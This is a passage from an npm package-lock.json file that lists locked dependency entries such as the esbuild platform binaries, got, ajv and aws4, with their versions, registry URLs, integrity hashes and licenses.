"resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.24.2.tgz", 273 | "integrity": "sha512-S0Bh0A53b0YHL2XEXC20bHLuGMOhFDO6GN4b3YjRLK//Ep3ql3erpNcPlEFed93hsQAjAQDNsvcK+hV90FubSw==", 274 | "cpu": [ 275 | "s390x" 276 | ], 277 | "dev": true, 278 | "optional": true, 279 | "os": [ 280 | "linux" 281 | ], 282 | "engines": { 283 | "node": ">=18" 284 | } 285 | }, 286 | "node_modules/@esbuild/linux-x64": { 287 | "version": "0.24.2", 288 | "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.24.2.tgz", 289 | "integrity": "sha512-8Qi4nQcCTbLnK9WoMjdC9NiTG6/E38RNICU6sUNqK0QFxCYgoARqVqxdFmWkdonVsvGqWhmm7MO0jyTqLqwj0Q==", 290 | "cpu": [ 291 | "x64" 292 | ], 293 | "dev": true, 294 | "optional": true, 295 | "os": [ 296 | "linux" 297 | ], 298 | "engines": { 299 | "node": ">=18" 300 | } 301 | }, 302 | "node_modules/@esbuild/netbsd-arm64": { 303 | "version": "0.24.2", 304 | "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.24.2.tgz", 305 | "integrity": "sha512-wuLK/VztRRpMt9zyHSazyCVdCXlpHkKm34WUyinD2lzK07FAHTq0KQvZZlXikNWkDGoT6x3TD51jKQ7gMVpopw==", 306 | "cpu": [ 307 | "arm64" 308 | ], 309 | "dev": true, 310 | "optional": true, 311 | "os": [ 312 | "netbsd" 313 | ], 314 | "engines": { 315 | "node": ">=18" 316 | } 317 | }, 318 | "node_modules/@esbuild/netbsd-x64": { 319 | "version": "0.24.2", 320 | "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.24.2.tgz", 321 | "integrity": "sha512-VefFaQUc4FMmJuAxmIHgUmfNiLXY438XrL4GDNV1Y1H/RW3qow68xTwjZKfj/+Plp9NANmzbH5R40Meudu8mmw==", 322 | "cpu": [ 323 | "x64" 324 | ], 325 | "dev": true, 326 | "optional": true, 327 | "os": [ 328 | "netbsd" 329 | ], 330 | "engines": { 331 | "node": ">=18" 332 | } 333 | }, 334 | "node_modules/@esbuild/openbsd-arm64": { 335 | "version": "0.24.2", 336 | "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.24.2.tgz", 337 | "integrity": "sha512-YQbi46SBct6iKnszhSvdluqDmxCJA+Pu280Av9WICNwQmMxV7nLRHZfjQzwbPs3jeWnuAhE9Jy0NrnJ12Oz+0A==", 338 | "cpu": [ 339 | "arm64" 340 | ], 341 | "dev": true, 342 | "optional": true, 343 | "os": [ 344 | "openbsd" 345 | ], 346 | "engines": { 347 | "node": ">=18" 348 | } 349 | }, 350 | "node_modules/@esbuild/openbsd-x64": { 351 | "version": "0.24.2", 352 | "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.24.2.tgz", 353 | "integrity": "sha512-+iDS6zpNM6EnJyWv0bMGLWSWeXGN/HTaF/LXHXHwejGsVi+ooqDfMCCTerNFxEkM3wYVcExkeGXNqshc9iMaOA==", 354 | "cpu": [ 355 | "x64" 356 | ], 357 | "dev": true, 358 | "optional": true, 359 | "os": [ 360 | "openbsd" 361 | ], 362 | "engines": { 363 | "node": ">=18" 364 | } 365 | }, 366 | "node_modules/@esbuild/sunos-x64": { 367 | "version": "0.24.2", 368 | "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.24.2.tgz", 369 | "integrity": "sha512-hTdsW27jcktEvpwNHJU4ZwWFGkz2zRJUz8pvddmXPtXDzVKTTINmlmga3ZzwcuMpUvLw7JkLy9QLKyGpD2Yxig==", 370 | "cpu": [ 371 | "x64" 372 | ], 373 | "dev": true, 374 | "optional": true, 375 | "os": [ 376 | "sunos" 377 | ], 378 | "engines": { 379 | "node": ">=18" 380 | } 381 | }, 382 | "node_modules/@esbuild/win32-arm64": { 383 | "version": "0.24.2", 384 | "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.24.2.tgz", 385 | "integrity": "sha512-LihEQ2BBKVFLOC9ZItT9iFprsE9tqjDjnbulhHoFxYQtQfai7qfluVODIYxt1PgdoyQkz23+01rzwNwYfutxUQ==", 386 | "cpu": [ 387 | "arm64" 388 | ], 389 | "dev": true, 390 | "optional": true, 391 | "os": [ 392 | "win32" 393 | ], 394 | "engines": { 395 | "node": ">=18" 396 | } 397 | }, 398 | "node_modules/@esbuild/win32-ia32": { 399 | "version": "0.24.2", 400 | "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.24.2.tgz", 401 | "integrity": "sha512-q+iGUwfs8tncmFC9pcnD5IvRHAzmbwQ3GPS5/ceCyHdjXubwQWI12MKWSNSMYLJMq23/IUCvJMS76PDqXe1fxA==", 402 | "cpu": [ 403 | "ia32" 404 | ], 405 | "dev": true, 406 | "optional": true, 407 | "os": [ 408 | "win32" 409 | ], 410 | "engines": { 411 | "node": ">=18" 412 | } 413 | }, 414 | "node_modules/@esbuild/win32-x64": { 415 | "version": "0.24.2", 416 | "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.24.2.tgz", 417 | "integrity": "sha512-7VTgWzgMGvup6aSqDPLiW5zHaxYJGTO4OokMjIlrCtf+VpEL+cXKtCvg723iguPYI5oaUNdS+/V7OU2gvXVWEg==", 418 | "cpu": [ 419 | "x64" 420 | ], 421 | "dev": true, 422 | "optional": true, 423 | "os": [ 424 | "win32" 425 | ], 426 | "engines": { 427 | "node": ">=18" 428 | } 429 | }, 430 | "node_modules/@sindresorhus/is": { 431 | "version": "4.6.0", 432 | "resolved": "https://registry.npmjs.org/@sindresorhus/is/-/is-4.6.0.tgz", 433 | "integrity": "sha512-t09vSN3MdfsyCHoFcTRCH/iUtG7OJ0CsjzB8cjAmKc/va/kIgeDI/TxsigdncE/4be734m0cvIYwNaV4i2XqAw==", 434 | "engines": { 435 | "node": ">=10" 436 | }, 437 | "funding": { 438 | "url": "https://github.com/sindresorhus/is?sponsor=1" 439 | } 440 | }, 441 | "node_modules/@szmarczak/http-timer": { 442 | "version": "4.0.6", 443 | "resolved": "https://registry.npmjs.org/@szmarczak/http-timer/-/http-timer-4.0.6.tgz", 444 | "integrity": "sha512-4BAffykYOgO+5nzBWYwE3W90sBgLJoUPRWWcL8wlyiM8IB8ipJz3UMJ9KXQd1RKQXpKp8Tutn80HZtWsu2u76w==", 445 | "dependencies": { 446 | "defer-to-connect": "^2.0.0" 447 | }, 448 | "engines": { 449 | "node": ">=10" 450 | } 451 | }, 452 | "node_modules/@types/cacheable-request": { 453 | "version": "6.0.3", 454 | "resolved": "https://registry.npmjs.org/@types/cacheable-request/-/cacheable-request-6.0.3.tgz", 455 | "integrity": "sha512-IQ3EbTzGxIigb1I3qPZc1rWJnH0BmSKv5QYTalEwweFvyBDLSAe24zP0le/hyi7ecGfZVlIVAg4BZqb8WBwKqw==", 456 | "dependencies": { 457 | "@types/http-cache-semantics": "*", 458 | "@types/keyv": "^3.1.4", 459 | "@types/node": "*", 460 | "@types/responselike": "^1.0.0" 461 | } 462 | }, 463 | "node_modules/@types/http-cache-semantics": { 464 | "version": "4.0.4", 465 | "resolved": "https://registry.npmjs.org/@types/http-cache-semantics/-/http-cache-semantics-4.0.4.tgz", 466 | "integrity": "sha512-1m0bIFVc7eJWyve9S0RnuRgcQqF/Xd5QsUZAZeQFr1Q3/p9JWoQQEqmVy+DPTNpGXwhgIetAoYF8JSc33q29QA==" 467 | }, 468 | "node_modules/@types/keyv": { 469 | "version": "3.1.4", 470 | "resolved": "https://registry.npmjs.org/@types/keyv/-/keyv-3.1.4.tgz", 471 | "integrity": "sha512-BQ5aZNSCpj7D6K2ksrRCTmKRLEpnPvWDiLPfoGyhZ++8YtiK9d/3DBKPJgry359X/P1PfruyYwvnvwFjuEiEIg==", 472 | "dependencies": { 473 | "@types/node": "*" 474 | } 475 | }, 476 | "node_modules/@types/node": { 477 | "version": "22.12.0", 478 | "resolved": "https://registry.npmjs.org/@types/node/-/node-22.12.0.tgz", 479 | "integrity": "sha512-Fll2FZ1riMjNmlmJOdAyY5pUbkftXslB5DgEzlIuNaiWhXd00FhWxVC/r4yV/4wBb9JfImTu+jiSvXTkJ7F/gA==", 480 | "dependencies": { 481 | "undici-types": "~6.20.0" 482 | } 483 | }, 484 | "node_modules/@types/responselike": { 485 | "version": "1.0.3", 486 | "resolved": "https://registry.npmjs.org/@types/responselike/-/responselike-1.0.3.tgz", 487 | "integrity": "sha512-H/+L+UkTV33uf49PH5pCAUBVPNj2nDBXTN+qS1dOwyyg24l3CcicicCA7ca+HMvJBZcFgl5r8e+RR6elsb4Lyw==", 488 | "dependencies": { 489 | "@types/node": "*" 490 | } 491 | }, 492 | "node_modules/agent-base": { 493 | "version": "7.1.3", 494 | "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", 495 | "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", 496 | "license": "MIT", 497 | "engines": { 498 | "node": ">= 14" 499 | } 500 | }, 501 | "node_modules/ajv": { 502 | "version": "6.12.6", 503 | "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", 504 | "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", 505 | "license": "MIT", 506 | "dependencies": { 507 | "fast-deep-equal": "^3.1.1", 508 | "fast-json-stable-stringify": "^2.0.0", 509 | "json-schema-traverse": "^0.4.1", 510 | "uri-js": "^4.2.2" 511 | }, 512 | "funding": { 513 | "type": "github", 514 | "url": "https://github.com/sponsors/epoberezkin" 515 | } 516 | }, 517 | "node_modules/asn1": { 518 | "version": "0.2.6", 519 | "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", 520 | "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", 521 | "license": "MIT", 522 | "dependencies": { 523 | "safer-buffer": "~2.1.0" 524 | } 525 | }, 526 | "node_modules/assert-plus": { 527 | "version": "1.0.0", 528 | "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", 529 | "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", 530 | "license": "MIT", 531 | "engines": { 532 | "node": ">=0.8" 533 | } 534 | }, 535 | "node_modules/async-mutex": { 536 | "version": "0.5.0", 537 | "resolved": "https://registry.npmjs.org/async-mutex/-/async-mutex-0.5.0.tgz", 538 | "integrity": "sha512-1A94B18jkJ3DYq284ohPxoXbfTA5HsQ7/Mf4DEhcyLx3Bz27Rh59iScbB6EPiP+B+joue6YCxcMXSbFC1tZKwA==", 539 | "license": "MIT", 540 | "dependencies": { 541 | "tslib": "^2.4.0" 542 | } 543 | }, 544 | "node_modules/asynckit": { 545 | "version": "0.4.0", 546 | "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", 547 | "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", 548 | "license": "MIT" 549 | }, 550 | "node_modules/atomic-sleep": { 551 | "version": "1.0.0", 552 | "resolved": "https://registry.npmjs.org/atomic-sleep/-/atomic-sleep-1.0.0.tgz", 553 | "integrity": "sha512-kNOjDqAh7px0XWNI+4QbzoiR/nTkHAWNud2uvnJquD1/x5a7EQZMJT0AczqK0Qn67oY/TTQ1LbUKajZpp3I9tQ==", 554 | "license": "MIT", 555 | "engines": { 556 | "node": ">=8.0.0" 557 | } 558 | }, 559 | "node_modules/aws-sign2": { 560 | "version": "0.7.0", 561 | "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", 562 | "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", 563 | "license": "Apache-2.0", 564 | "engines": { 565 | "node": "*" 566 | } 567 | }, 568 | "node_modules/aws4": { 569 | "version": "1.13.2", 570 | "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.13.2.tgz", 571 | "integrity": "sha512-lHe62zvbTB5eEABUVi/AwVh0ZKY9rMMDhmm+eeyuuUQbQ3+J+fONVQOZyj+DdrvD4BY33uYniyRJ4UJIaSKAfw==", 572 | "license": "MIT" 573 | }, 574 | "node_modules/bcrypt-pbkdf": { 575 | "version": "1.0.2", 576 | "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", 577 | "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", 578 | "license": "BSD-3-Clause", 579 | "dependencies": { 580 | "tweetnacl": "^0.14.3" 581 | } 582 | }, 583 | "node_modules/cacheable-lookup": { 584 | "version": "5.0.4", 585 | "resolved": "https://registry.npmjs.org/cacheable-lookup/-/cacheable-lookup-5.0.4.tgz", 586 | "integrity": "sha512-2/kNscPhpcxrOigMZzbiWF7dz8ilhb/nIHU3EyZiXWXpeq/au8qJ8VhdftMkty3n7Gj6HIGalQG8oiBNB3AJgA==", 587 | "engines": { 588 | "node": ">=10.6.0" 589 | } 590 | }, 591 | "node_modules/cacheable-request": { 592 | "version": "7.0.4", 593 | "resolved": "https://registry.npmjs.org/cacheable-request/-/cacheable-request-7.0.4.tgz", 594 | "integrity": "sha512-v+p6ongsrp0yTGbJXjgxPow2+DL93DASP4kXCDKb8/bwRtt9OEF3whggkkDkGNzgcWy2XaF4a8nZglC7uElscg==", 595 | "dependencies": { 596 | "clone-response": "^1.0.2", 597 | "get-stream": "^5.1.0", 598 | "http-cache-semantics": "^4.0.0", 599 | "keyv": "^4.0.0", 600 | "lowercase-keys": "^2.0.0", 601 | "normalize-url": "^6.0.1", 602 | "responselike": "^2.0.0" 603 | }, 604 | "engines": { 605 | "node": ">=8" 606 | } 607 | }, 608 | "node_modules/caseless": { 609 | "version": "0.12.0", 610 | "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", 611 | "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==", 612 | "license": "Apache-2.0" 613 | }, 614 | "node_modules/clone-response": { 615 | "version": "1.0.3", 616 | "resolved": "https://registry.npmjs.org/clone-response/-/clone-response-1.0.3.tgz", 617 | "integrity": "sha512-ROoL94jJH2dUVML2Y/5PEDNaSHgeOdSDicUyS7izcF63G6sTc/FTjLub4b8Il9S8S0beOfYt0TaA5qvFK+w0wA==", 618 | "dependencies": { 619 | "mimic-response": "^1.0.0" 620 | }, 621 | "funding": { 622 | "url": "https://github.com/sponsors/sindresorhus" 623 | } 624 | }, 625 | "node_modules/combined-stream": { 626 | "version": "1.0.8", 627 | "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", 628 | "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", 629 | "license": "MIT", 630 | "dependencies": { 631 | "delayed-stream": "~1.0.0" 632 | }, 633 | "engines": { 634 | "node": ">= 0.8" 635 | } 636 | }, 637 | "node_modules/core-util-is": { 638 | "version": "1.0.3", 639 | "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", 640 | "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==", 641 | "license": "MIT" 642 | }, 643 | "node_modules/dashdash": { 644 | "version": "1.14.1", 645 | "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", 646 | "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", 647 | "license": "MIT", 648 | "dependencies": { 649 | "assert-plus": "^1.0.0" 650 | }, 651 | "engines": { 652 | "node": ">=0.10" 653 | } 654 | }, 655 | "node_modules/date-fns": { 656 | "version": "4.1.0", 657 | "resolved": "https://registry.npmjs.org/date-fns/-/date-fns-4.1.0.tgz", 658 | "integrity": "sha512-Ukq0owbQXxa/U3EGtsdVBkR1w7KOQ5gIBqdH2hkvknzZPYvBxb/aa6E8L7tmjFtkwZBu3UXBbjIgPo/Ez4xaNg==", 659 | "license": "MIT", 660 | "funding": { 661 | "type": "github", 662 | "url": "https://github.com/sponsors/kossnocorp" 663 | } 664 | }, 665 | "node_modules/debug": { 666 | "version": "4.4.0", 667 | "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", 668 | "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", 669 | "license": "MIT", 670 | "dependencies": { 671 | "ms": "^2.1.3" 672 | }, 673 | "engines": { 674 | "node": ">=6.0" 675 | }, 676 | "peerDependenciesMeta": { 677 | "supports-color": { 678 | "optional": true 679 | } 680 | } 681 | }, 682 | "node_modules/decompress-response": { 683 | "version": "6.0.0", 684 | "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", 685 | "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", 686 | "dependencies": { 687 | "mimic-response": "^3.1.0" 688 | }, 689 | "engines": { 690 | "node": ">=10" 691 | }, 692 | "funding": { 693 | "url": "https://github.com/sponsors/sindresorhus" 694 | } 695 | }, 696 | "node_modules/decompress-response/node_modules/mimic-response": { 697 | "version": "3.1.0", 698 | "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", 699 | "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", 700 | "engines": { 701 | "node": ">=10" 702 | }, 703 | "funding": { 704 | "url": "https://github.com/sponsors/sindresorhus" 705 | } 706 | }, 707 | "node_modules/defer-to-connect": { 708 | "version": "2.0.1", 709 | "resolved": "https://registry.npmjs.org/defer-to-connect/-/defer-to-connect-2.0.1.tgz", 710 | "integrity": "sha512-4tvttepXG1VaYGrRibk5EwJd1t4udunSOVMdLSAL6mId1ix438oPwPZMALY41FCijukO1L0twNcGsdzS7dHgDg==", 711 | "engines": { 712 | "node": ">=10" 713 | } 714 | }, 715 | "node_modules/delayed-stream": { 716 | "version": "1.0.0", 717 | "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", 718 | "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", 719 | "license": "MIT", 720 | "engines": { 721 | "node": ">=0.4.0" 722 | } 723 | }, 724 | "node_modules/ecc-jsbn": { 725 | "version": "0.1.2", 726 | "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", 727 | "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", 728 | "license": "MIT", 729 | "dependencies": { 730 | "jsbn": "~0.1.0", 731 | "safer-buffer": "^2.1.0" 732 | } 733 | }, 734 | "node_modules/ecc-jsbn/node_modules/jsbn": { 735 | "version": "0.1.1", 736 | "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", 737 | "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==", 738 | "license": "MIT" 739 | }, 740 | "node_modules/encoding-japanese": { 741 | "version": "2.2.0", 742 | "resolved": "https://registry.npmjs.org/encoding-japanese/-/encoding-japanese-2.2.0.tgz", 743 | "integrity": "sha512-EuJWwlHPZ1LbADuKTClvHtwbaFn4rOD+dRAbWysqEOXRc2Uui0hJInNJrsdH0c+OhJA4nrCBdSkW4DD5YxAo6A==", 744 | "license": "MIT", 745 | "engines": { 746 | "node": ">=8.10.0" 747 | } 748 | }, 749 | "node_modules/end-of-stream": { 750 | "version": "1.4.4", 751 | "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", 752 | "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", 753 | "dependencies": { 754 | "once": "^1.4.0" 755 | } 756 | }, 757 | "node_modules/esbuild": { 758 | "version": "0.24.2", 759 | "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.24.2.tgz", 760 | "integrity": "sha512-+9egpBW8I3CD5XPe0n6BfT5fxLzxrlDzqydF3aviG+9ni1lDC/OvMHcxqEFV0+LANZG5R1bFMWfUrjVsdwxJvA==", 761 | "dev": true, 762 | "hasInstallScript": true, 763 | "bin": { 764 | "esbuild": "bin/esbuild" 765 | }, 766 | "engines": { 767 | "node": ">=18" 768 | }, 769 | "optionalDependencies": { 770 | "@esbuild/aix-ppc64": "0.24.2", 771 | "@esbuild/android-arm": "0.24.2", 772 | "@esbuild/android-arm64": "0.24.2", 773 | "@esbuild/android-x64": "0.24.2", 774 | "@esbuild/darwin-arm64": "0.24.2", 775 | "@esbuild/darwin-x64": "0.24.2", 776 | "@esbuild/freebsd-arm64": "0.24.2", 777 | "@esbuild/freebsd-x64": "0.24.2", 778 | "@esbuild/linux-arm": "0.24.2", 779 | "@esbuild/linux-arm64": "0.24.2", 780 | "@esbuild/linux-ia32": "0.24.2", 781 | "@esbuild/linux-loong64": "0.24.2", 782 | "@esbuild/linux-mips64el": "0.24.2", 783 | "@esbuild/linux-ppc64": "0.24.2", 784 | "@esbuild/linux-riscv64": "0.24.2", 785 | "@esbuild/linux-s390x": "0.24.2", 786 | "@esbuild/linux-x64": "0.24.2", 787 | "@esbuild/netbsd-arm64": "0.24.2", 788 | "@esbuild/netbsd-x64": "0.24.2", 789 | "@esbuild/openbsd-arm64": "0.24.2", 790 | "@esbuild/openbsd-x64": "0.24.2", 791 | "@esbuild/sunos-x64": "0.24.2", 792 | "@esbuild/win32-arm64": "0.24.2", 793 | "@esbuild/win32-ia32": "0.24.2", 794 | "@esbuild/win32-x64": "0.24.2" 795 | } 796 | }, 797 | "node_modules/extend": { 798 | "version": "3.0.2", 799 | "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", 800 | "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", 801 | "license": "MIT" 802 | }, 803 | "node_modules/extsprintf": { 804 | "version": "1.3.0", 805 | "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", 806 | "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", 807 | "engines": [ 808 | "node >=0.6.0" 809 | ], 810 | "license": "MIT" 811 | }, 812 | "node_modules/fast-deep-equal": { 813 | "version": "3.1.3", 814 | "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", 815 | "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", 816 | "license": "MIT" 817 | }, 818 | "node_modules/fast-json-stable-stringify": { 819 | "version": "2.1.0", 820 | "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", 821 | "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", 822 | "license": "MIT" 823 | }, 824 | "node_modules/fast-redact": { 825 | "version": "3.5.0", 826 | "resolved": "https://registry.npmjs.org/fast-redact/-/fast-redact-3.5.0.tgz", 827 | "integrity": "sha512-dwsoQlS7h9hMeYUq1W++23NDcBLV4KqONnITDV9DjfS3q1SgDGVrBdvvTLUotWtPSD7asWDV9/CmsZPy8Hf70A==", 828 | "license": "MIT", 829 | "engines": { 830 | "node": ">=6" 831 | } 832 | }, 833 | "node_modules/forever-agent": { 834 | "version": "0.6.1", 835 | "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", 836 | "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", 837 | "license": "Apache-2.0", 838 | "engines": { 839 | "node": "*" 840 | } 841 | }, 842 | "node_modules/get-stream": { 843 | "version": "5.2.0", 844 | "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", 845 | "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", 846 | "dependencies": { 847 | "pump": "^3.0.0" 848 | }, 849 | "engines": { 850 | "node": ">=8" 851 | }, 852 | "funding": { 853 | "url": "https://github.com/sponsors/sindresorhus" 854 | } 855 | }, 856 | "node_modules/getpass": { 857 | "version": "0.1.7", 858 | "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", 859 | "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", 860 | "license": "MIT", 861 | "dependencies": { 862 | "assert-plus": "^1.0.0" 863 | } 864 | }, 865 | "node_modules/got": { 866 | "version": "11.8.6", 867 | "resolved": "https://registry.npmjs.org/got/-/got-11.8.6.tgz", 868 | "integrity": "sha512-6tfZ91bOr7bOXnK7PRDCGBLa1H4U080YHNaAQ2KsMGlLEzRbk44nsZF2E1IeRc3vtJHPVbKCYgdFbaGO2ljd8g==", 869 | "dependencies": { 870 | "@sindresorhus/is": "^4.0.0", 871 | "@szmarczak/http-timer": "^4.0.5", 872 | "@types/cacheable-request": "^6.0.1", 873 | "@types/responselike": "^1.0.0", 874 | "cacheable-lookup": "^5.0.3", 875 | "cacheable-request": "^7.0.2", 876 | "decompress-response": "^6.0.0", 877 | "http2-wrapper": "^1.0.0-beta.5.2", 878 | "lowercase-keys": "^2.0.0", 879 | "p-cancelable": "^2.0.0", 880 | "responselike": "^2.0.0" 881 | }, 882 | "engines": { 883 | "node": ">=10.19.0" 884 | }, 885 | "funding": { 886 | "url": "https://github.com/sindresorhus/got?sponsor=1" 887 | } 888 | }, 889 | "node_modules/har-schema": { 890 | "version": "2.0.0", 891 | "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", 892 | "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", 893 | "license": "ISC", 894 | "engines": { 895 | "node": ">=4" 896 | } 897 | }, 898 | "node_modules/har-validator": { 899 | "version": "5.1.5", 900 | "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", 901 | "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", 902 | "deprecated": "this library is no longer supported", 903 | "license": "MIT", 904 | "dependencies": { 905 | "ajv": "^6.12.3", 906 | "har-schema": "^2.0.0" 907 | }, 908 | "engines": { 909 | "node": ">=6" 910 | } 911 | }, 912 | "node_modules/http-cache-semantics": { 913 | "version": "4.1.1", 914 | "resolved": "https://registry.npmjs.org/http-cache-semantics/-/http-cache-semantics-4.1.1.tgz", 915 | "integrity": "sha512-er295DKPVsV82j5kw1Gjt+ADA/XYHsajl82cGNQG2eyoPkvgUhX+nDIyelzhIWbbsXP39EHcI6l5tYs2FYqYXQ==" 916 | }, 917 | "node_modules/http-signature": { 918 | "version": "1.2.0", 919 | "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", 920 | "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", 921 | "license": 